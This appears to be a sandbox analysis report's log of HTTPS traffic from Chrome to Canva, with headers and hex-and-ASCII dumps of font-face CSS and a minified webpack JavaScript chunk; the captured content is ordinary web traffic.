                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1086INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 35234
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512facdd4294-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1053060
                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                    ETag: "e09e2e1fc340201f46c6b422ba600d5a"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 15:01:45 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 28 May 2024 05:01:57 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-id-2: aWkibxSB0D2psh3WvTi45jRg8SxIViHozktv0ZPWKIUWYBt0Vsllc6a/vrQzLzT+HjuLH+9GqiAG2E3Ziz415izN/sJc2/3N
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 2SR1W285E8C87V9C
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: .LwsDALTLPPbe12hNbmuW5TcVaOT13Xr
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC380INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 42 55 34 78 78 37 57 65 31 64 44 63 79 25 32 42 37 57 31 25 32 42 6a 65 25 32 46 5a 68 67 6b 6c 7a 25 32 42 64 47 42 64 25 32 42 51 56 6d 4b 49 25 32 46 68 74 79 50 7a 46 48 30 25 32 42 79 42 52 32 38 69 38 68 50 39 7a 25 32 42 57 49 50 30 75 49 67 32 5a 38 42 33 52 78 7a 74 79 6c 72 63 39 6a 56 79 71 77 56 30 58 4c 50 4b 69 52 30 4c 52 6a 51 4e 31 68 4b 25 32 46 44 41 67 7a 34 45 37 77 37 58 56 79 59 31 4d 25 32 46 6b 53 37 30 25 32 46 49 31 30 7a 6d 42 76 47 35 34 30 25 32 46 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BU4xx7We1dDcy%2B7W1%2Bje%2FZhgklz%2BdGBd%2BQVmKI%2FhtyPzFH0%2ByBR28i8hP9z%2BWIP0uIg2Z8B3Rxztylrc9jVyqwV0XLPKiR0LRjQN1hK%2FDAgz4E7w7XVyY1M%2FkS70%2FI10zmBvG540%2FQ%3D%3D"}],"gr
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1272INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74
                                                                                                                                                                                                                                                                    Data Ascii: @font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 33 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22
                                                                                                                                                                                                                                                                    Data Ascii: ttps://font-public.canva.com/_fb/0/03.ttf) format("truetype")}@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 100; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 30 2f 30 34 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e
                                                                                                                                                                                                                                                                    Data Ascii: 0/04.ttf) format("truetype")}@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 300; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22
                                                                                                                                                                                                                                                                    Data Ascii: ont-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 600; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63
                                                                                                                                                                                                                                                                    Data Ascii: ,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 900; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.c
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 37 44 2e 6f 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 32 31 39 30 2d 32 62 31 61 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 37 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20
                                                                                                                                                                                                                                                                    Data Ascii: ttps://font-public.canva.com/_fb/0/7D.otf) format("truetype")}@font-face {unicode-range: U+2190-2b1a; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: italic; src: url(https://font-public.canva.com/_fb/0/7E.woff2) format("woff2"),
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 31 30 30 2d 31 31 66 66 2c 55 2b 32 30 30 32 2d 32 30 30 33 2c 55 2b 32 30 64 64 2d 32 30 64 65 2c 55 2b 32 31 36 30 2d 32 31 37 62 2c 55 2b 32 65 38 30 2d 39 66 64 30 2c 55 2b 61 39 36 30 2d 61 39 37 63 2c 55 2b 61 63 30 30 2d 66 61 36 64 2c 55 2b 66 65 31 30 2d 66 65 31 39 2c 55 2b 66 65 33 30 2d 66 65 36 62 2c 55 2b 66 66 30 31 2d 66 66 65 65 2c 55 2b 31 66 31 30 30 2d 32 66 39 66 34 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61
                                                                                                                                                                                                                                                                    Data Ascii: at("truetype")}@font-face {unicode-range: U+1100-11ff,U+2002-2003,U+20dd-20de,U+2160-217b,U+2e80-9fd0,U+a960-a97c,U+ac00-fa6d,U+fe10-fe19,U+fe30-fe6b,U+ff01-ffee,U+1f100-2f9f4; font-family: "_fb_"; font-display: swap; font-weight: 700; font-style: norma
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2d 71 75 61 64 72 61 74 69 63 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2e 6f 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 64 38 32 2d 64 66 34 2c 55 2b 31 31
                                                                                                                                                                                                                                                                    Data Ascii: 2"), url(https://font-public.canva.com/_fb/0/16.woff) format("woff"), url(https://font-public.canva.com/_fb/0/16-quadratic.woff) format("woff"), url(https://font-public.canva.com/_fb/0/16.otf) format("truetype")}@font-face {unicode-range: U+d82-df4,U+11
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 36 30 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 36 30 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 36 30 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 39 30 30 2d 39 37 66 2c 55 2b 31 63 64 30 2d 31 63 66 39 2c 55 2b 61 38 33 30 2d 61 38 66 64 3b 20
                                                                                                                                                                                                                                                                    Data Ascii: s://font-public.canva.com/_fb/0/60.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/60.woff) format("woff"), url(https://font-public.canva.com/_fb/0/60.ttf) format("truetype")}@font-face {unicode-range: U+900-97f,U+1cd0-1cf9,U+a830-a8fd;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    83192.168.2.1249807104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC824OUTGET /chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1148INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 19427
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512fde6a41f5-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49961
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:17 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: lciN7bHCMnagVcQ1IttfFB0zF4rT5+G9Xiox27kYewuFAudcaXGT9oqz5HuASwsdgqlXZsudA94=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: CPYGY0T0VH684CWZ
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: VfS41lenCWjjboc1vnem1GKyKg2CLlMU
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC372INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 54 4a 5a 42 76 63 51 77 7a 66 77 51 4b 68 6f 55 25 32 46 53 49 57 6c 37 35 4d 38 64 78 4d 47 44 77 32 25 32 42 69 33 70 25 32 42 45 67 59 33 34 6e 41 34 61 33 77 74 47 25 32 42 70 71 44 79 37 61 65 75 6d 79 25 32 46 77 79 5a 42 33 44 31 34 63 6b 25 32 46 57 71 77 68 53 68 58 58 79 33 64 42 56 6c 36 79 4c 32 77 79 67 78 46 75 6d 41 52 49 35 68 6c 6e 75 42 53 4f 78 4f 25 32 42 74 45 6f 51 54 44 63 35 42 6b 6a 38 70 4a 6c 77 36 62 57 5a 54 72 66 4b 63 6d 68 36 56 25 32 42 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJZBvcQwzfwQKhoU%2FSIWl75M8dxMGDw2%2Bi3p%2BEgY34nA4a3wtG%2BpqDy7aeumy%2FwyZB3D14ck%2FWqwhShXXy3dBVl6yL2wygxFumARI5hlnuBSOxO%2BtEoQTDc5Bkj8pJlw6bWZTrfKcmh6V%2BE%3D"}],"group":"cf
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1218INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 35 37 35 36 61 30 33 30 34 39 38 66 38 30 66 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 33 30 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 39 30 36 39 37 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:5756a030498f80f0.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6305],{/***/ 790697:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 63 74 69 6f 6e 28 61 29 7b 5f 5f 63 2e 74 28 6e 75 6c 6c 21 3d 61 2e 75 73 65 72 49 64 26 26 2f 5e 55 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2d 5d 7b 31 30 7d 24 2f 2e 74 65 73 74 28 61 2e 75 73 65 72 49 64 29 2c 22 47 65 74 50 72 69 76 61 63 79 50 72 65 66 65 72 65 6e 63 65 73 52 65 71 75 65 73 74 23 75 73 65 72 49 64 20 64 6f 65 73 20 6e 6f 74 20 6d 61 74 63 68 3a 20 55 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2d 5d 7b 31 30 7d 22 29 3b 63 6f 6e 73 74 20 62 3d 5f 5f 63 2e 62 7a 28 5b 5f 5f 63 2e 65 44 2c 22 70 72 69 76 61 63 79 70 72 65 66 65 72 65 6e 63 65 73 22 2c 61 2e 75 73 65 72 49 64 5d 29 3b 5f 5f 63 2e 61 7a 28 62 2c 7b 69 6e 63 6c 75 64 65 55 73 65 72 44 65 74 61 69 6c 73 3a 61 2e 53 51 61 2c 69 6e 63 6c 75 64 65 42 72 61 6e 64 4c 65 76 65 6c 45 6c 69 67 69
                                                                                                                                                                                                                                                                    Data Ascii: ction(a){__c.t(null!=a.userId&&/^U[a-zA-Z0-9_-]{10}$/.test(a.userId),"GetPrivacyPreferencesRequest#userId does not match: U[a-zA-Z0-9_-]{10}");const b=__c.bz([__c.eD,"privacypreferences",a.userId]);__c.az(b,{includeUserDetails:a.SQa,includeBrandLevelEligi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC217INData Raw: 29 7b 74 68 69 73 2e 62 6f 6f 74 73 74 72 61 70 3d 61 7d 7d 3b 76 61 72 20 68 4e 63 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 46 28 61 29 7b 5f 5f 63 2e 50 28 61 2c 7b 5a 69 61 3a 63 36 2c 51 37 3a 63 36 7d 29 7d 73 74 61 72 74 28 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 69 38 28 74 68 69 73 2e 73 74 6f 72 65 29 7d 5a 69 61 28 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 5a 69 61 28 74 68 69 73 2e 73 74 6f 72 65 2c 61 29 7d 51 37 28 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63
                                                                                                                                                                                                                                                                    Data Ascii: ){this.bootstrap=a}};var hNc=class{static F(a){__c.P(a,{Zia:c6,Q7:c6})}start(){this.store&&this.client&&this.client.i8(this.store)}Zia(a){this.store&&this.client&&this.client.Zia(this.store,a)}Q7(a){this.store&&this.c
